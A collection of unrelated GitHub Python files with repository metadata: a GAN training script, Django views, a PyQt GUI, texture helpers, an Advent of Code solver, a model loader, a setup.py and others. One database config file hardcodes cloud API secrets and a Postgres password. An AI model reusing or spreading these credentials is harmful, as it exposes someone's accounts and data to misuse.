# show(datingDataMat,datingLabels)
| geroge-gao/MachineLeaning | kNN/kNN.py | kNN.py | py | 4,622 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "operator.itemgetter",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "matplo... |
23861578625 | from collections import defaultdict
def is_isogram(string):
dt = defaultdict(int)
for c in string.lower():
dt[c] += 1
for k in dt:
if k.isalpha() and dt[k] > 1:
return False
return True
| stackcats/exercism | python/isogram.py | isogram.py | py | 231 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 4,
"usage_type": "call"
}
] |
17643428428 | import argparse
import os
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm import tqdm
from torchvision.utils import save_image
from torch.utils.data import Dataset, DataLoader
import albumentations
from albumentations.pytorch import ToTensorV2
from PIL import Image
import numpy as np
torch.backends.cudnn.benchmark = True
# Dicriminator model definition
class Discriminator(nn.Module):
def __init__(self, in_channels=3) -> None:
super().__init__()
self.convlayers = nn.Sequential(
nn.Conv2d(in_channels=in_channels*2, out_channels=64,
kernel_size=4, stride=2, padding=1, padding_mode="reflect",),
nn.LeakyReLU(0.2),
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4,
stride=2, bias=False, padding_mode="reflect",),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2),
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4,
stride=2, bias=False, padding_mode="reflect",),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2),
nn.Conv2d(in_channels=256, out_channels=512, kernel_size=4,
stride=1, bias=False, padding_mode="reflect",),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2),
nn.Conv2d(in_channels=512, out_channels=1, kernel_size=4,
stride=1, padding=1, padding_mode="reflect",),
nn.LeakyReLU(0.2),
)
def forward(self, x, y) -> None:
out = torch.cat([x, y], dim=1)
out = self.convlayers(out)
return out
# generator class definition
class Generator(nn.Module):
# U-NET encoder section
def encoder(self, in_channels, out_channel, is_relu=False, need_batch_norm=True):
x = nn.Sequential(
nn.Conv2d(in_channels, out_channel, 4, 2, 1,
bias=False, padding_mode="reflect"),
nn.BatchNorm2d(out_channel) if need_batch_norm else None,
nn.ReLU() if is_relu else nn.LeakyReLU(),
)
return x
# # U-NET decoder section
def decoder(self, in_channels, out_channel, is_relu=False, need_batch_norm=True, need_dropout=True, ):
return nn.Sequential(
nn.ConvTranspose2d(in_channels, out_channel, 4, 2, 1, bias=False),
nn.BatchNorm2d(out_channel),
nn.ReLU() if is_relu else nn.LeakyReLU(),
) if not need_dropout else nn.Sequential(
nn.ConvTranspose2d(in_channels, out_channel, 4, 2, 1, bias=False),
nn.BatchNorm2d(out_channel),
nn.ReLU() if is_relu else nn.LeakyReLU(),
nn.Dropout(0.5),
)
def __init__(self, in_channels=3, features=64):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(in_channels, features, kernel_size=4,
stride=2, padding=1, padding_mode="reflect"),
nn.LeakyReLU(0.2),
)
self.layer2 = self.encoder(
in_channels=features, out_channel=features * 2)
self.layer3 = self.encoder(features * 2, features * 4)
self.layer4 = self.encoder(features * 4, features * 8)
self.layer5 = self.encoder(features * 8, features * 8)
self.layer6 = self.encoder(features * 8, features * 8)
self.layer7 = self.encoder(features * 8, features * 8)
# self.latent = self.encoder(
# features * 8, features * 8, need_batch_norm=False)
self.latent = nn.Sequential(
nn.Conv2d(features * 8, features * 8, kernel_size=4,
stride=2, padding=1),
nn.ReLU(),
)
self.layer8 = self.decoder(features * 8, features * 8, is_relu=True)
self.layer9 = self.decoder(
features * 8 * 2, features * 8, is_relu=True)
self.layer10 = self.decoder(
features * 8 * 2, features * 8, is_relu=True)
self.layer11 = self.decoder(
features * 8 * 2, features * 8, is_relu=True, need_dropout=False)
self.layer12 = self.decoder(
features * 8 * 2, features * 4, is_relu=True, need_dropout=False)
self.layer13 = self.decoder(
features * 4 * 2, features * 2, is_relu=True, need_dropout=False)
self.layer14 = self.decoder(
features * 2 * 2, features, is_relu=True, need_dropout=False)
self.layer15 = nn.Sequential(
nn.ConvTranspose2d(features*2, in_channels, 4, 2, 1, bias=False),
nn.Tanh(),
)
def forward(self, x):
layer1 = self.layer1(x)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
layer5 = self.layer5(layer4)
layer6 = self.layer6(layer5)
layer7 = self.layer7(layer6)
latent = self.latent(layer7)
layer8 = self.layer8(latent)
layer9 = self.layer9(torch.cat([layer8, layer7], 1))
layer10 = self.layer10(torch.cat([layer9, layer6], 1))
layer11 = self.layer11(torch.cat([layer10, layer5], 1))
layer12 = self.layer12(torch.cat([layer11, layer4], 1))
layer13 = self.layer13(torch.cat([layer12, layer3], 1))
layer14 = self.layer14(torch.cat([layer13, layer2], 1))
return self.layer15(torch.cat([layer14, layer1], 1))
# global class for constants and hyperparameters
class config:
DEVICE = "cuda:0" if torch.cuda.is_available() else "cpu"
TRAIN_DIR = "data/daynight/train"
VAL_DIR = "data/daynight/val"
LEARNING_RATE = 0.0002
BATCH_SIZE = 16
NUM_WORKERS = 2
LAMBDA = 100
NUM_EPOCHS = 50
LOAD_MODEL = False
SAVE_MODEL = True
FLIP_TRAIN = False
CHECKPOINT_DISC = "disc.pth.tar"
CHECKPOINT_GEN = "gen.pth.tar"
MODEL_DEFAULT = 'maps'
MODEL_ANIME = 'anime'
MODEL_DAYNIGHT = 'daynight'
MODE = 'train'
class DataTransformation:
resize = albumentations.Compose(
[albumentations.Resize(width=256, height=256), ], additional_targets={"image0": "image"},
)
transform = albumentations.Compose(
[
albumentations.HorizontalFlip(p=0.5),
albumentations.ColorJitter(p=0.2),
albumentations.Normalize(mean=[0.5, 0.5, 0.5], std=[
0.5, 0.5, 0.5], max_pixel_value=255.0,),
ToTensorV2(),
]
)
tranform_mask = albumentations.Compose(
[
albumentations.Normalize(mean=[0.5, 0.5, 0.5], std=[
0.5, 0.5, 0.5], max_pixel_value=255.0,),
ToTensorV2(),
]
)
def save_checkpoint(model, optimizer, filename="my_checkpoint.pth.tar"):
print("=> Saving checkpoint")
torch.save({
"state_dict": model.state_dict(),
"optimizer": optimizer.state_dict(),
}, filename)
def load_checkpoint(checkpoint_file, model, optimizer, lr):
print("=> Loading checkpoint")
checkpoint = torch.load(checkpoint_file, map_location=config.DEVICE)
model.load_state_dict(checkpoint["state_dict"])
optimizer.load_state_dict(checkpoint["optimizer"])
for param_group in optimizer.param_groups:
param_group["lr"] = lr
'''
This class extends the pytorch Dataset class
'''
class SplitData(Dataset):
def __init__(self, root_dir) -> None:
self.root_dir = root_dir
self.list_files = os.listdir(self.root_dir)
def __len__(self) -> None:
return len(self.list_files)
def __getitem__(self, index) -> None:
img_file = self.list_files[index]
img_path = os.path.join(self.root_dir, img_file)
image = np.array(Image.open(img_path))
# get the image shape
image_dim = int(image.shape[1]/2)
# print('image shape: ', image_dim)
flip = config.FLIP_TRAIN
# print('flip: ', flip)
if flip:
target_image = image[:, :image_dim, :]
input_image = image[:, image_dim:, :]
else:
input_image = image[:, :image_dim, :]
target_image = image[:, image_dim:, :]
augmentations = DataTransformation.resize(
image=input_image, image0=target_image)
input_image = augmentations["image"]
target_image = augmentations["image0"]
input_image = DataTransformation.transform(image=input_image)["image"]
target_image = DataTransformation.tranform_mask(image=target_image)[
"image"]
return input_image, target_image
def get_l1_loss(weights) -> torch.Tensor:
return torch.abs(weights).sum()
def get_l2_loss(weights) -> torch.Tensor:
return torch.square(weights).sum()
def train_fn(
disc, gen, loader, opt_disc, opt_gen, l1_loss, bce, gen_scaler, disc_scaler,
) -> None:
loop = tqdm(loader, leave=True)
for idx, (x, y) in enumerate(loop):
x = x.to(config.DEVICE)
y = y.to(config.DEVICE)
# Train Discriminator
with torch.cuda.amp.autocast():
y_fake = gen(x)
Disc_real = disc(x, y)
Disc_real_loss = bce(Disc_real, torch.ones_like(Disc_real))
Disc_fake = disc(x, y_fake.detach())
Disc_fake_loss = bce(Disc_fake, torch.zeros_like(Disc_fake))
Disc_loss = (Disc_real_loss + Disc_fake_loss) / 2
disc.zero_grad()
disc_scaler.scale(Disc_loss).backward()
disc_scaler.step(opt_disc)
disc_scaler.update()
# Train generator
with torch.cuda.amp.autocast():
Disc_fake = disc(x, y_fake)
Gen_fake_loss = bce(Disc_fake, torch.ones_like(Disc_fake))
l1 = l1_loss(y_fake, y) * config.LAMBDA
params = []
for param in disc.parameters():
params.append(param.view(-1))
# l1 = config.LAMBDA * get_l1_loss(torch.cat(params))
l2 = config.LAMBDA * get_l2_loss(torch.cat(params))
Gen_loss = Gen_fake_loss + l1 + l2
opt_gen.zero_grad()
gen_scaler.scale(Gen_loss).backward()
gen_scaler.step(opt_gen)
gen_scaler.update()
if idx % 10 == 0:
loop.set_postfix(
Disc_real=torch.sigmoid(Disc_real).mean().item(),
Disc_fake=torch.sigmoid(Disc_fake).mean().item(),
)
# helper functions
def _getTrainDirectoryPath(modelname):
return 'data/'+modelname+'/train' if modelname != None or modelname != '' else 'data/maps/train'
def _getValDirectoryPath(modelname):
return 'data/'+modelname+'/val' if modelname != None or modelname != '' else 'data/maps/val'
def _getDiscCheckpointPath(modelname):
return modelname+'_'+config.CHECKPOINT_DISC if modelname != None or modelname != '' else 'maps_'+config.CHECKPOINT_DISC
def _getGenCheckpointPath(modelname):
return modelname+'_'+config.CHECKPOINT_GEN if modelname != None or modelname != '' else 'maps_'+config.CHECKPOINT_GEN
def main(args) -> None:
# get data from the command line arguments
config.LOAD_MODEL = True if str(args.loadmodel).lower() == 'true' else False
config.FLIP_TRAIN = True if str(args.flip).lower() == 'true' else False
config.NUM_EPOCHS = int(
args.epochs) if args.epochs != None else config.NUM_EPOCHS
config.MODE = args.mode if args.mode != None else config.MODE
disc = Discriminator(in_channels=3).to(config.DEVICE)
gen = Generator(in_channels=3, features=64).to(config.DEVICE)
opt_disc = optim.Adam(
disc.parameters(), lr=config.LEARNING_RATE, betas=(0.5, 0.999),)
opt_gen = optim.Adam(
gen.parameters(), lr=config.LEARNING_RATE, betas=(0.5, 0.999))
BCE = nn.BCEWithLogitsLoss()
L1_LOSS = nn.L1Loss()
print('saved gen checkpoint path: ', _getGenCheckpointPath(args.modelname))
print('saved disc checkpoint path: ',
_getDiscCheckpointPath(args.modelname))
print('Load model value: ', config.LOAD_MODEL, type(config.LOAD_MODEL))
if config.LOAD_MODEL:
load_checkpoint(
_getGenCheckpointPath(
args.modelname), gen, opt_gen, config.LEARNING_RATE,
)
load_checkpoint(
_getDiscCheckpointPath(
args.modelname), disc, opt_disc, config.LEARNING_RATE,
)
train_dataset = SplitData(root_dir=_getTrainDirectoryPath(args.modelname))
train_loader = DataLoader(
train_dataset,
batch_size=config.BATCH_SIZE,
shuffle=True,
num_workers=config.NUM_WORKERS,
)
gen_scaler = torch.cuda.amp.GradScaler()
disc_scaler = torch.cuda.amp.GradScaler()
val_dataset = SplitData(root_dir=_getValDirectoryPath(args.modelname))
val_loader = DataLoader(val_dataset, batch_size=1, shuffle=False)
val_itr = iter(val_loader)
for epoch in range(1, config.NUM_EPOCHS+1):
if(config.MODE == 'train'):
print('Epoch: {}/{}'.format(epoch, config.NUM_EPOCHS))
train_fn(
disc, gen, train_loader, opt_disc, opt_gen, L1_LOSS, BCE, gen_scaler, disc_scaler,
)
if config.SAVE_MODEL and epoch % 5 == 0:
save_checkpoint(
gen, opt_gen, filename=_getGenCheckpointPath(args.modelname))
save_checkpoint(
disc, opt_disc, filename=_getDiscCheckpointPath(args.modelname))
try:
x, y = next(val_itr)
# get_test_samples(gen, x, y, epoch, folder="evaluation")
x, y = x.to(config.DEVICE), y.to(config.DEVICE)
folder = "evaluation"
gen.eval()
with torch.no_grad():
y_fake = gen(x)
y_fake = y_fake * 0.5 + 0.5
save_image(y_fake, folder + f"/y_gen_{epoch}.png")
save_image(x * 0.5 + 0.5, folder + f"/input_{epoch}.png")
save_image(y * 0.5 + 0.5, folder + f"/label_{epoch}.png")
gen.train()
except:
pass
if __name__ == "__main__":
# setting up the argument parser to parse the command line arguments
argparser = argparse.ArgumentParser()
argparser.add_argument("--flip", default='false',
help="learn the left side of the image")
argparser.add_argument(
"--modelname", default=config.MODEL_DEFAULT, help="which model to load")
argparser.add_argument("--mode", default='test',
help='start in train or test mode')
argparser.add_argument("--epochs", default=50,
help="number of epochs to train")
argparser.add_argument("--loadmodel", default='false', help='load model or not')
args = argparser.parse_args()
# printing the passed args to debug
print(args)
# run the main function with all the passed command line arguments
main(args)
| ishon19/CSE676-FinalProject | Pix2Pix.py | Pix2Pix.py | py | 14,819 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.backends",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Module",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential... |
73659014184 | from django.shortcuts import render, redirect, HttpResponse
from django.contrib import messages
from login.models import User
from .models import Quote
# Create your views here.
def quotes(request):
if 'user_id' not in request.session:
return redirect('/')
all_users = User.objects.all()
user = User.objects.get(id=request.session['user_id'])
# quotes = Quote.objects.all()
likes = Quote.objects.filter(users_who_liked__id=user.id)
total_likes = likes.count()
quotes = Quote.objects.all().order_by('-id').exclude(id__in=[l.id for l in likes])
all_quotes = Quote.objects.all()
context = {
'all_users': all_users,
'user': user,
'quotes': quotes,
'all_quotes': all_quotes,
'likes': likes,
'total_likes': total_likes,
}
return render(request, "quotes.html", context)
def addQuote(request):
id = request.session['user_id']
user = User.objects.get(id=id)
errors = Quote.objects.validator(request.POST, id)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect("/quotes")
else:
new_quote = Quote.objects.create(
content = request.POST['quote'],
author = request.POST['author'],
poster = user,
)
return redirect("/quotes")
def addLike(request, quote_id):
if 'user_id' not in request.session:
return redirect('/')
current_user = User.objects.get(id=request.session['user_id'])
likedQuotes = Quote.objects.get(id=quote_id)
current_user.likes.add(likedQuotes)
return redirect('/quotes')
def deleteQuote(request, quote_id):
q2del = Quote.objects.get(id=quote_id)
q2del.delete()
return redirect('/quotes')
| everhartC/QuoteDash | quoteApp/views.py | views.py | py | 1,807 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.redirect",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "login.models.User.objects.all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "login.models.User.objects",
"line_number": 11,
"usage_type": "attribute"
},
{
... |
14893965980 | #coding: utf-8
import sys,io
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import QIcon
class Main(QWidget):
def __init__(self):
super().__init__()
self.mainUI()
def mainUI(self):
self.setGeometry(300,300,300,300)
self.setWindowTitle('文字区切り君')
self.lineEdit = QLineEdit(self)
self.button = QPushButton('区切る!',self)
self.button.clicked.connect(self.buttonClicked)
#layout
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.lineEdit)
self.vbox.addWidget(self.button)
self.setLayout(self.vbox)
self.show()
def buttonClicked(self):
if(self.lineEdit.text() is None):
pass
contents = str(self.lineEdit.text())
chars = list(contents)
strings = '/'.join(chars)
f = open('textfile.txt', 'w')
f.write(strings)
f.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
gui = Main()
sys.exit(app.exec_())
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
| hirotask/-Python-mojiretu_kugiru | 文字列区切る君/main.py | main.py | py | 1,205 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "sys.exit",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"line_number": 49,
"usage_type": "attribute"
},
{
"api_name": "io.TextIOWrapper",
"line_n... |
15871423301 | from pathlib import Path
from typing import Any, Dict
import torch
from tsm import TSM
from tsn import TSN, TRN, MTRN
verb_class_count, noun_class_count = 125, 352
class_count = (verb_class_count, noun_class_count)
def make_tsn(settings):
return TSN(
class_count,
settings["segment_count"],
settings["modality"],
base_model=settings["arch"],
new_length=settings["flow_length"] if settings["modality"] == "Flow" else 1,
consensus_type=settings["consensus_type"],
dropout=settings["dropout"],
)
def make_trn(settings):
model_type = settings["model_type"]
if model_type == "trn":
cls = TRN
elif model_type == "mtrn":
cls = MTRN
else:
raise ValueError(f"Unknown model_type '{model_type}' for TRN")
return cls(
class_count,
settings["segment_count"],
settings["modality"],
base_model=settings["arch"],
new_length=settings["flow_length"] if settings["modality"] == "Flow" else 1,
img_feature_dim=settings["img_feature_dim"],
dropout=settings["dropout"],
)
def make_tsm(settings):
non_local = settings["model_type"].endswith("-nl")
return TSM(
class_count,
settings["segment_count"],
settings["modality"],
base_model=settings["arch"],
new_length=settings["flow_length"] if settings["modality"] == "Flow" else 1,
consensus_type="avg",
dropout=settings["dropout"],
shift_div=settings["shift_div"],
shift_place=settings["shift_place"],
temporal_pool=settings["temporal_pool"],
non_local=non_local,
)
def make_model(settings: Dict[str, Any]) -> torch.nn.Module:
model_factories = {
"tsn": make_tsn,
"trn": make_trn,
"mtrn": make_trn,
"tsm": make_tsm,
"tsm-nl": make_tsm,
}
return model_factories[settings["model_type"]](settings)
def get_model_settings_from_checkpoint(ckpt: Dict[str, Any]) -> Dict[str, Any]:
settings = {
key: ckpt[key] for key in ["model_type", "segment_count", "modality", "arch"]
}
if ckpt["model_type"] == "tsn":
settings["consensus_type"] = ckpt["consensus_type"]
if ckpt["model_type"] in ["tsm", "tsm-nl"]:
for key in ["shift_place", "shift_div", "temporal_pool", "non_local"]:
settings[key] = ckpt[key]
if ckpt["model_type"] in ["trn", "mtrn"]:
settings["img_feature_dim"] = ckpt["img_feature_dim"]
settings.update(
{key: getattr(ckpt["args"], key) for key in ["flow_length", "dropout"]}
)
return settings
def load_checkpoint(checkpoint_path: Path) -> torch.nn.Module:
ckpt = torch.load(checkpoint_path)
model_settings = get_model_settings_from_checkpoint(ckpt)
model = make_model(model_settings)
model.load_state_dict(ckpt["state_dict"])
return model
| epic-kitchens/epic-kitchens-55-action-models | model_loader.py | model_loader.py | py | 2,906 | python | en | code | 73 | github-code | 36 | [
{
"api_name": "tsn.TSN",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "tsn.TRN",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "tsn.MTRN",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "tsm.TSM",
"line_number": 46,
"usage_... |
26192939759 | import os
import png
import math
from color_helpers import convert_16_bit_texture_for_pypng
# IO THPS Scene Image Correction
def shift_row_pixels(row_pixels, shift_amount):
shifted_row = []
shifted_row.extend(row_pixels[shift_amount * -4 :])
shifted_row.extend(row_pixels[0 : shift_amount * -4])
return shifted_row
def shift_image_rows(image_data, shift_amount):
shifted_image = image_data.copy()
for _ in range(shift_amount):
new_rows = []
new_rows.append(shifted_image[-1])
new_rows.extend(shifted_image[0:-1])
shifted_image = new_rows
return shifted_image
def shift_image_column(image_data, col_index, shift_amount, image_height):
column_data = []
col_start_index = col_index * 4
for row_index in range(image_height):
column_data.extend(image_data[row_index][col_start_index : col_start_index + 4])
shifted_column = shift_row_pixels(column_data, shift_amount)
new_image_data = []
for row_index in range(image_height):
if col_index != 0:
new_image_data.append(image_data[row_index][0:col_start_index])
else:
new_image_data.append([])
new_image_data[row_index].extend(shifted_column[row_index * 4 : row_index * 4 + 4])
new_image_data[row_index].extend(image_data[row_index][col_start_index + 4 :])
return new_image_data
def fix_pixel_data(width, height, pixels):
initial_image = []
for row in range(0, height):
cur_row = []
for col in reversed(range(row * width, (row + 1) * width)):
cur_row.extend(pixels[col])
shifted_right = shift_row_pixels(cur_row, 1)
initial_image.append(shifted_right)
shifted_down = shift_image_rows(initial_image, 1)
return shift_image_column(shifted_down, 0, -1, height)
# End IO THPS Scene Image Correction
def write_image(output_path, width, height, final_image):
os.makedirs(os.path.dirname(output_path), exist_ok=True)
output_file = open(output_path, "wb")
writer = png.Writer(width, height, greyscale=False, alpha=True)
writer.write(output_file, final_image)
output_file.close()
def write_to_png(filename, output_dir, create_sub_dirs, pvr, pixels):
filename_without_extension = "".join(filename.split(".")[0:-1])
if create_sub_dirs:
output_dir = os.path.join(output_dir, filename_without_extension)
output_path = os.path.join(output_dir, f"{filename_without_extension}_{pvr.header_offset:#0{8}x}.png")
if pvr.pal_size != 65536:
write_image(output_path, pvr.width, pvr.height, fix_pixel_data(pvr.width, pvr.height, pixels))
else:
write_image(output_path, pvr.width, pvr.height, convert_16_bit_texture_for_pypng(pvr.pixel_format, pvr.width, pixels))
| slfx77/psx_texture_extractor | helpers.py | helpers.py | py | 2,778 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "os.makedirs",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 61,
"usage_type": "attribute"
},
{
"api_name": "png.Writer",
"line_numbe... |
23013394729 | import requests
import os
def gokidsgo():
a = input('Url? default: 127.0.0.1/').rstrip()
if a == '':
url = 'http://127.0.0.1/icons/folder.gif'
print('grabbing: ' + url)
req = requests.get(url, timeout=90)
if req.ok:
dat = req.text
print(dat)
else:
print('error: ')
print(str(req.status_code))
else:
url = a
req = requests.get(url, timeout=90)
if req.ok:
dat = req.text
print(dat)
else:
print('error: ')
print(str(req.status_code))
def main():
a = input('ready, type go, or type exit').rstrip()
if a.find('exit') > -1:
print('quitting')
quit()
if a.find('go') > -1:
gokidsgo()
if a == '':
gokidsgo()
main()
if __name__ == "__main__":
main() | thcsparky/bigclickskid | oldtries/sandbox.py | sandbox.py | py | 952 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 21,
"usage_type": "call"
}
] |
4275879545 | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import cloudinary
cloudinary.config(
cloud_name="djtxsnk9c",
api_key="372171617535646",
api_secret="2zMo8MA5wgslqPtRwHOVS1AFRks",
)
# SQLALCHEMY_DATABASE_URL = "sqlite:///./sql_app.db"
SQLALCHEMY_DATABASE_URL = "postgres://dmgshbpnrymmwi:262dd54c1af68404d1ad96bfc7d61323703e56f967432b51931a3f6a6643ed4d@ec2-34-206-8-52.compute-1.amazonaws.com:5432/d6bnjatookfchk"
# "postgresql://fastapi_user:fastapi@localhost/fastapi_db"
engine = create_engine(
SQLALCHEMY_DATABASE_URL, # connect_args={"check_same_thread": False}
)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
| ddicko/deploy_fastapi | sql_app/database.py | database.py | py | 775 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cloudinary.config",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.create_engine",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.orm.sessionmaker",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": ... |
28985781241 | from collections import Counter
from typing import Generator, Iterable, Literal, Set
import click
import trimesh.creation
from aoc_2022_kws.cli import main
from aoc_2022_kws.config import config
from trimesh import transformations
class Facet:
def __init__(
self, axis: Literal["x", "y", "z"], x: int, y: int, z: int, vector: int
):
self.axis = axis
self.x = x
self.y = y
self.z = z
self.vector = vector
def __repr__(self):
return f"Facet({self.axis}, {self.x}, {self.y}, {self.z} [{self.vector}])"
def __eq__(self, other):
return (
self.axis == other.axis
and self.x == other.x
and self.y == other.y
and self.z == other.z
)
def __hash__(self):
return hash((self.axis, self.x, self.y, self.z))
class Cube:
def __init__(self, *args):
if len(args) == 1:
self.x, self.y, self.z = [int(i) for i in args[0].split(",")]
else:
self.x, self.y, self.z = args
def __eq__(self, other):
return self.x == other.x and self.y == other.y and self.z == other.z
def __hash__(self):
return hash((self.x, self.y, self.z))
@property
def faces(self) -> Generator[Facet, None, None]:
yield Facet("x", self.x, self.y, self.z, -1)
yield Facet("x", self.x + 1, self.y, self.z, 1)
yield Facet("y", self.x, self.y, self.z, -1)
yield Facet("y", self.x, self.y + 1, self.z, 1)
yield Facet("z", self.x, self.y, self.z, -1)
yield Facet("z", self.x, self.y, self.z + 1, 1)
@property
def mesh(self):
move = transformations.translation_matrix(
(self.x + 0.5, self.y + 0.5, self.z + 0.5)
)
return trimesh.creation.box(extents=(1, 1, 1), transform=move)
def exterior(self, cubes: Set["Cube"]):
if set(self.neighbours) - set(cubes):
return True
def neighbour(self, x=0, y=0, z=0):
return Cube(self.x + x, self.y + y, self.z + z)
@property
def neighbours(self):
return [
self.neighbour(x=-1),
self.neighbour(x=1),
self.neighbour(y=-1),
self.neighbour(y=1),
self.neighbour(z=-1),
self.neighbour(z=1),
]
def calculate_bounding_box(cubes: Iterable[Cube]):
x_min = y_min = z_min = 0
x_max = y_max = z_max = 0
for cube in cubes:
x_min = min(x_min, cube.x)
y_min = min(y_min, cube.y)
z_min = min(z_min, cube.z)
x_max = max(x_max, cube.x)
y_max = max(y_max, cube.y)
z_max = max(z_max, cube.z)
return x_min, y_min, z_min, x_max, y_max, z_max
@main.command()
@click.option("--sample", "-s", is_flag=True)
@click.option("--save", type=click.Path(dir_okay=False), default=None)
@click.option("--view", is_flag=True)
def day18(sample, save, view):
if sample:
input_data = (config.SAMPLE_DIR / "day18.txt").read_text()
else:
input_data = (config.USER_DIR / "day18.txt").read_text()
cubes = [Cube(line) for line in input_data.splitlines()]
if save:
combined = trimesh.util.concatenate([c.mesh for c in cubes])
combined.export(save)
if view:
combined = trimesh.util.concatenate([c.mesh for c in cubes])
combined.show()
if view or save:
return
# Part 1
all_faces = []
for c in cubes:
all_faces.extend(c.faces)
face_counts = Counter(all_faces)
covered_faces = set([f for f, c in face_counts.items() if c > 1])
surface_faces = set(all_faces) - covered_faces
print("Part 1", len(surface_faces))
#######################################
# Part 2 #
#######################################
x_min, y_min, z_min, x_max, y_max, z_max = calculate_bounding_box(cubes)
print("Bounding box", x_min, y_min, z_min, x_max, y_max, z_max)
void_cubes = set()
for x in range(x_min - 1, x_max + 2):
for y in range(y_min - 1, y_max + 2):
for z in range(z_min - 1, z_max + 2):
my_cube = Cube(x, y, z)
if not my_cube in cubes:
void_cubes.add(my_cube)
print("Void cubes", len(void_cubes))
whole_area = set(cubes) | set(void_cubes)
print("Before", len(whole_area))
to_remove: Set | None = None
while to_remove is None or len(to_remove) > 0:
if to_remove:
whole_area -= to_remove
to_remove = set()
for my_cube in whole_area & void_cubes:
if my_cube in void_cubes and my_cube.exterior(whole_area):
to_remove.add(my_cube)
internal_void_cubes = set([c for c in whole_area if c in void_cubes])
print("After", len(internal_void_cubes))
internal_faces = set(f for c in internal_void_cubes for f in c.faces)
external_faces = surface_faces - internal_faces
print("Part 2", len(external_faces))
| SocialFinanceDigitalLabs/AdventOfCode | solutions/2022/kws/aoc_2022_kws/day_18.py | day_18.py | py | 5,002 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "typing.Literal",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "typing.Generator",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "trimesh.transformations.translation_matrix",
"line_number": 60,
"usage_type": "call"
},
{
"api_na... |
38285078798 | from setuptools import find_packages, setup
with open("README.txt") as f:
readme = f.read() + "\n"
with open("CHANGES.txt") as f:
readme += f.read() + "\n"
with open("HACKING.txt") as f:
readme += f.read()
setup(
name="fc.qemu",
version="1.4.1.dev0",
author="Christian Kauhaus, Christian Theune",
author_email="mail@flyingcircus.io",
url="http://github.com/flyingcircusio/fc.qemu",
description="Qemu VM management utilities",
long_description=readme,
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Programming Language :: Python :: 3.8",
],
zip_safe=False,
license="BSD",
namespace_packages=["fc"],
install_requires=[
"colorama", # ==0.3.3',
"abaez.consulate==1.1.0",
"psutil", # ==5.4.2',
"PyYaml>=5.3.1",
"requests", # ==2.11.1',
"setuptools",
"structlog>=16.1.0",
],
entry_points={
"console_scripts": [
"fc-qemu = fc.qemu.main:main",
"supervised-qemu = fc.qemu.hazmat.supervise:main",
],
},
)
| flyingcircusio/fc.qemu | setup.py | setup.py | py | 1,233 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 18,
"usage_type": "call"
}
] |
70853975785 | # -*- coding: utf-8 -*-
from __future__ import print_function
from nltk.stem.porter import PorterStemmer
from textblob import TextBlob
from wordcloud import WordCloud
import nltk
import json
import matplotlib.pyplot as plt
import os
import string
from textblob.sentiments import NaiveBayesAnalyzer
ps = PorterStemmer()
tweetDict = {}
def main(name,location):
directory = "Corpus Data"
count = 0
if location == "":
filename = 'tweet_stream_{}.json'.format(name)
fileCorpus = 'tweet_stream_{}.txt'.format(name)
else:
filename = 'tweet_stream_{}_{}.json'.format(name,location)
fileCorpus = 'tweet_stream_{}_{}.txt'.format(name,location)
print(filename)
#Read dataset containing tweets
with open(filename) as json_file:
tweets = json.load(json_file)
with open(directory + '/' + fileCorpus, 'w') as f:
for tweet in tweets:
#Removal of special characters
encoded_tweet=tweet[1].encode('utf-8')
unicode_text = encoded_tweet.decode('unicode_escape').encode('ascii','ignore')
punct=string.punctuation
table_p=string.maketrans(punct,len(punct)*" ")
